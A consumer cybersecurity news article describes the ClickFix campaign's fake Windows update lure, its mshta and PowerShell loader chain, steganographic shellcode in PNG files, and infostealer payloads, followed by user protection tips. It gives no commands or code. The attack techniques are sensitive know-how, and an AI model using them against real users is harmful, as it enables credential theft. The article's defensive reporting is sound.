Cybercriminals are evolving their tactics, using a new approach to distribute malware disguised as a Windows update. The ongoing ClickFix campaign has shifted from traditional human verification methods to a more deceptive full-screen update screen that closely resembles legitimate Windows updates. This development poses significant risks as users may unwittingly follow the prompts, leading to malware infections.
Researchers from Joe Security have observed that ClickFix now presents a fake Windows update screen that includes familiar progress bars and update messages. When users encounter this, they are prompted to run a command through the Run box, which silently downloads a malware dropper. Typically, the final payload is an infostealer that targets sensitive information like passwords and cookies.
This malware operates by exploiting the user’s trust in Windows updates. The moment a user executes the command, a file named mshta.exe connects to a remote server and retrieves a script. To evade detection, these attackers often employ hex encoding in their URLs and rotate their paths frequently. The script runs obfuscated PowerShell code, which is designed to mislead security researchers.
The complexity of this attack lies in its use of steganography, a technique that hides malicious code within seemingly innocuous image files. In this case, the malware is concealed within the pixel data of a PNG file. The attackers subtly alter color values, especially in the red channel, to embed shellcode. When the image is viewed, it appears completely normal, allowing the malware to remain undetected by traditional security tools.
Once activated, the shellcode is injected into a trusted Windows process, such as explorer.exe, using well-known in-memory techniques. Recent activities linked to ClickFix have involved infostealers like LummaC2 and updated versions of Rhadamanthys, which are adept at harvesting credentials while remaining discreet.
Key Protective Measures Against ClickFix
To combat the ClickFix campaign and similar threats, users should adopt several precautionary measures:
1. **Avoid Unsolicited Commands**: Users should never run commands they did not initiate. Legitimate operating system updates will not require commands to be executed from a webpage.
2. **Check Update Sources**: Windows updates should only be accessed via the official Windows Settings app or through trusted system notifications. Any unsolicited pop-up claiming to be an update should be disregarded.
3. **Utilize Reputable Antivirus Software**: Choosing a security suite capable of detecting both file-based and in-memory threats is essential. Stealthy attacks like ClickFix often evade detection by traditional file-scanning methods, so behavioral detection is crucial.
4. **Employ a Password Manager**: Password managers can generate strong, unique passwords for each account and autofill information only on legitimate websites, helping to prevent credential theft.
5. **Consider Data Removal Services**: Services that help minimize online exposure can reduce the risk of being targeted by scammers. They request the removal of personal information from data broker sites.
6. **Verify URLs Before Trusting**: Users should scrutinize domain names and ensure they match official sites to avoid falling victim to phishing attempts.
7. **Exit Suspicious Full-Screen Pages**: If a webpage unexpectedly takes over the full screen, users should exit immediately and scan their systems for potential threats.
Kurt “CyberGuy” Knutsson emphasizes the reliance of ClickFix on user interaction. The threat becomes particularly dangerous when users are prompted to run commands that seem routine. By mimicking trusted interfaces, attackers seek to manipulate users into facilitating the malware installation.
Staying informed and cautious is paramount to safeguarding personal information and avoiding falling prey to such cyber threats. For additional information and security tips, users are encouraged to subscribe to the CyberGuy Report.
